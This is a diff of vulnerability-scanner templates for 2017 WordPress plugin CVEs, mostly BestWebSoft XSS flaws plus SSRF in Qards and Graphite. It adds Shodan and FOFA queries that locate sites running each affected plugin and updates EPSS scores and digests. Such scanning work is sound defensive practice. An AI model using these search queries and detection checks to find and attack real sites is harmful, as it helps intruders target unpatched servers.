cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7d15632ab8608bebbe97636df7a941eb29ba3f4012e1664edf568e71e0b616b022021f975e64e8083830d43231fa29398e32fe3a7e90079f8f7efc58beb5471d59b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 93ddcfad77..c2987358e1 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: twitter_button framework: wordpress + shodan-query: http.html:/wp-content/plugins/twitter-plugin/ + fofa-query: body=/wp-content/plugins/twitter-plugin/ publicwww-query: "/wp-content/plugins/twitter-plugin/" tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5c1938441664f32ae5956e67cdeb722a5e451ed9dd2610860beda5af343c47802202dbf8097ea677f4060fc221409b73bc2477f534f193acb72991c2da8aede78a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index bedf2a9ea8..0761257e06 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: bestwebsoft product: linkedin framework: wordpress + shodan-query: http.html:/wp-content/plugins/bws-linkedin/ + fofa-query: body=/wp-content/plugins/bws-linkedin/ publicwww-query: "/wp-content/plugins/bws-linkedin/" tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft @@ -52,4 +54,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de73b829433dc9021aec272db32b7414d70a25a6a8c5460a5b2889af85d2d7f102203859644f40022a8ab83f4f8d96d3f5922780fd1bc94983b82284b04bee1c2045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 590b427a09..e2c9f204cc 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: bestwebsoft product: pinterest framework: wordpress + shodan-query: http.html:/wp-content/plugins/bws-pinterest/ + fofa-query: body=/wp-content/plugins/bws-pinterest/ publicwww-query: /wp-content/plugins/bws-pinterest/ tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft @@ -52,4 +54,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009784298525357d1b2864c132ae0a0abb38cc1462b72e9e2be45350fe80d52583022100e1dc4efd37ce072b4d7b929721fd53c927b04660f45c21977911db02b4f50c28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index a6aa60cd0c..8abcf319a7 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: bestwebsoft product: smtp framework: wordpress + shodan-query: http.html:/wp-content/plugins/bws-smtp/ + fofa-query: body=/wp-content/plugins/bws-smtp/ publicwww-query: /wp-content/plugins/bws-smtp/ tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft @@ -52,4 +54,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203619a6bded48a49cb312df0a7d9cca61a3832299a1647cfd152a834ae9f1281c022100a526ecf0569c6f2d5c81278d6441b2f0a89c773c547695a429994388fc0fbf7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index b62e90fb9a..ad3dc71044 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: pagination framework: wordpress + shodan-query: http.html:/wp-content/plugins/pagination/ + fofa-query: body=/wp-content/plugins/pagination/ publicwww-query: "/wp-content/plugins/pagination/" tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100feff368a0cdd9a49edd3b0b5d5173703c49eccce649db0cd5ee1592f86e02829022100948e666a38ab177ef10ac2bbdca68dc637c9f000be8096693cb36e3bc1496873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 5e2a3b4028..aa10dbf145 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: pdf_\&_print framework: wordpress + shodan-query: http.html:/wp-content/plugins/pdf-print/ + fofa-query: body=/wp-content/plugins/pdf-print/ publicwww-query: "/wp-content/plugins/pdf-print/" tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ed65a94dc92a061051f438d1678d744cd221e59c78a6b9245d2bb046fe46d0b0220285a1de29f9ab0a109640a034f0e7271d50ef354659548698cbdb8b550c22a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 844e663cbb..b616f3a683 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: promobar framework: wordpress + shodan-query: http.html:/wp-content/plugins/promobar/ + fofa-query: body=/wp-content/plugins/promobar/ publicwww-query: /wp-content/plugins/promobar/ tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bec59508977cb56db530d49037132274e613a3a2132e1a709934737d7f937c8b02203096247c5a7b011c3f8ac126777b3632dd959c07a6ddfae10913120293afce55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index b51207a43c..8ed1cf7458 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: rating framework: wordpress + shodan-query: http.html:/wp-content/plugins/rating-bws/ + fofa-query: body=/wp-content/plugins/rating-bws/ publicwww-query: "/wp-content/plugins/rating-bws/" tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 490a004630440220217ca670c25fd088273af9e902e6a30cf2ca9fa7555a0a0ad608454e147ef75c0220668e31fc705d4ceea309b1449b1311d65e0d07f98813067bb6205352b6e9985d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091d8aac6a707f173c291302675374aa0d10f520b5c55af53dd46b367bbbddad602204382953b0ec8e5756a2b9463836ff893ad60a694779540f84999a47e50450d1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index f926ec8b94..79f0c5cadf 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: realty framework: wordpress + shodan-query: http.html:/wp-content/plugins/realty/ + fofa-query: body=/wp-content/plugins/realty/ publicwww-query: /wp-content/plugins/realty/ tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a004730450220370407ad931bf1c297e16c99d3c5c1ca953628677fc94ea86715e3131e2b0233022100f740ab11752605c7ddc1fe1f1c1724858aad10d2b52e78f1f9f4a416290da561:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020e456320394136770d7b6a23fdb9d21f0af1f8fc601122bc231982ffa0472f00220265606c9cbc35d1151fd6148ade06a74ee53a90fdf6c12f33d00ab08e339dce0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index cd26894b3d..a44a70c343 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef531d92525eaf4b6152954eebea1e6c23d7c515afce012b6c1223079ec3ad9002210086b9a6f9ffefa3c35ec6bbe9ee00c650696dced3b57ab09fe2c93ebc05d0a5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index a967010a40..375bbabcdf 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: visitors_online framework: wordpress + shodan-query: http.html:/wp-content/plugins/visitors-online/ + fofa-query: body=/wp-content/plugins/visitors-online/ publicwww-query: "/wp-content/plugins/visitors-online/" tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100f6694c2351da20106780916ead57acded8b3561215bff593cfc360a10dedda34022100c75806459a4114b92d8648e825188a9cbc42ba259aa226de782c73040b0007dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097e05f20cb0afd081f129b36eb2758d1aa244bf0617bef586964eb3031f0c4f9022100dce185e320545c24e802d4dd695d9e2cfba3a387b8de48241d828a3a5b80b478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 4dc23667c9..e72bfeef0f 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.59511 + epss-percentile: 0.60119 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: zendesk_help_center framework: wordpress + shodan-query: http.html:/wp-content/plugins/zendesk-help-center/ + fofa-query: body=/wp-content/plugins/zendesk-help-center/ publicwww-query: "/wp-content/plugins/zendesk-help-center/" tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a0047304502200f7aefa84c2f74418d8bfda7eaebb599348ddbbfb4c230fcfc56a9b82ccc1b3d022100eeaecc0e672ed38b43954db6259d083cd20eb2535283ec8ac0e9154f6d71d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064b6b4da3715e1cd54ebe4c590fe066f88e1afa074bf62596f6b2c4c093bb185022019b68f9bf0cec36c4c3befc1afdded4713daac91435a3ab8b873d0dc233fa992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 0069a24e8b..d66ee50b85 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: bestwebsoft product: google_analytics framework: wordpress + shodan-query: http.html:/wp-content/plugins/bws-google-analytics/ + fofa-query: body=/wp-content/plugins/bws-google-analytics/ publicwww-query: "/wp-content/plugins/bws-google-analytics/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft @@ -52,4 +54,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4a0a00473045022058df345caa79fcc85007be091f7b75d399b7d9f2502995f539f1e3387b69d9e7022100d5f4cc931077b75d81472cc62173979120b245394f458e0e02215ea798ce26bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1d8dff14b510f9f76ca38b26ce1576d6fa9d581a219f4b0de8e9d69c0e1ca790221008ff36e7393e2e657a067c86ce074b2b43daef945d13218e20a25e1f662311311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 90fa86fe6c..a3d4684b99 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: bestwebsoft product: google_maps framework: wordpress + shodan-query: http.html:/wp-content/plugins/bws-google-maps/ + fofa-query: body=/wp-content/plugins/bws-google-maps/ publicwww-query: "/wp-content/plugins/bws-google-maps/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft @@ -52,4 +54,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 490a0046304402202f2ce883ac28fa110099e93debcea93ba72a87c644e7d50eab47ba65b5b0c0010220263c16a96c6d3ee59ee4639403d581676533664e25e9d12ddafed64e9f58a560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd32ef8ce244009ee4a5dd2d3ab51a1d38d23cb75bdf7356bf42d8e3a0e39249022004f072b84e4296ab5506a996081bce336a98567e2fa50f62b220888ca5da6844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index ac1987e5ac..a1a81a8923 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: testimonials framework: wordpress + shodan-query: http.html:/wp-content/plugins/bws-testimonials/ + fofa-query: body=/wp-content/plugins/bws-testimonials/ publicwww-query: "/wp-content/plugins/bws-testimonials/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450221008db3605db8249b8d03ef76b687a919f1586b95a60fd71fb15afb8cc74ba152130220371bf249484018debba5b816e27dcf3f7d8fdd724c87788635a6136b1266ef07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7de515c52e7cccf2e9c8583a2b96019185e53673e9523e5f5b6cc30872f67c4022077c8a0a13614b8843fd0affccba2ccf2af9942fa0ba8f208a03c114120640a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index cf3f3bc36f..b1fa1d44ee 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: error_log_viewer framework: wordpress + shodan-query: http.html:/wp-content/plugins/error-log-viewer/ + fofa-query: body=/wp-content/plugins/error-log-viewer/ publicwww-query: "/wp-content/plugins/error-log-viewer/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 490a0046304402204ffa643dfec6a2a1304afeb8c507e527816e6ffdbf5bf55d1f78ce117196956c022062d2904783e48e1571ddcd034438544bd6ef716a64604b5cd204c9e6d93f17fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b49b5546c5e356ed090a5baa16111876c4c991b69c5dc67046b81a2ad108879a022100d453b82a07de52435050cab4b3efd7c6117b6ed887ca1e6b6ce7dbc98fd99230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 4aa9bf9453..b0c44b6c2f 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: sender framework: wordpress + shodan-query: http.html:/wp-content/plugins/sender/ + fofa-query: body=/wp-content/plugins/sender/ publicwww-query: "/wp-content/plugins/sender/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 490a0046304402206bf5a1ea4bf5034892e440458b150b6df66ff63e42a5677e30878b7d4b43d34102205868e55cb82cdee0363c36f0da53f76767397ddc734f06b2df94b8835493bbe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d7b910fbb597d244b1ea4ccd7d651abea88be36087caab1e0acfda7ce34b94c02203a1f52d4311fe05cbe69ec2e8ad15bdd999b037254222c69de4bc8144edfe40a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 8c99ba4b6a..74ff166257 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: updater framework: wordpress + shodan-query: http.html:/wp-content/plugins/updater/ + fofa-query: body=/wp-content/plugins/updater/ publicwww-query: "/wp-content/plugins/updater/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a00473045022100a044599dd64fbe525d5491598bb2bd08fb20f3b1246daa85cf894198d9a4b72a02202c881e075c5cf297c2153729f9a3bca4925a615334a49850ca79a635c41b5efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038b686e39461befca7d2bc4f8f78d0dc75e69d84ef8c4056ac5e34fad2f974e702203b13411d7ba9f49d6fdf88f3df351015546d243e5774fea755d55c5623a859e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index fdd8dd2053..167c9ffdd4 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: bestwebsoft product: user_role framework: wordpress + shodan-query: http.html:/wp-content/plugins/user-role/ + fofa-query: body=/wp-content/plugins/user-role/ publicwww-query: "/wp-content/plugins/user-role/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft @@ -51,4 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2964e3ac4a9459594ff524255c05de5947d7b4273e3e440dc7d7e523de9927202200245b68ce01c7a285508761d463bca02f818233aa3d234d8a907ca3e7d0df75a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index b7393b1790..af69cc9176 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.38554 + epss-percentile: 0.39752 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: designmodo product: qards framework: wordpress tags: cve2017,cve,wp-plugin,oast,wpscan,wordpress,ssrf,xss,designmodo - flow: http(1) && http(2) http: @@ -59,4 +58,4 @@ http: part: body words: - "console.log" -# digest: 4b0a00483046022100a1ebb8975874781de2f146909353d3cb9d51b05b60508558c7d599376c062441022100c9a14b006fb26874b9b2f075e436d6c4ca526fe128d549c7c9a7fd5ed7c35cef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d961b089a63d45d6ed79318ecc950215ff98fbf47d84e9c48af4d81d4e5196c30221009f486cc6e72e6d1e1ba532d4b7730d9d6a92a246b4c4e071ae3b2a69d195e829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index f79e1ee9db..6f0e8b5a88 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-18638 cwe-id: CWE-918 - epss-score: 0.00902 - epss-percentile: 0.80938 + epss-score: 0.00827 + epss-percentile: 0.81931 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 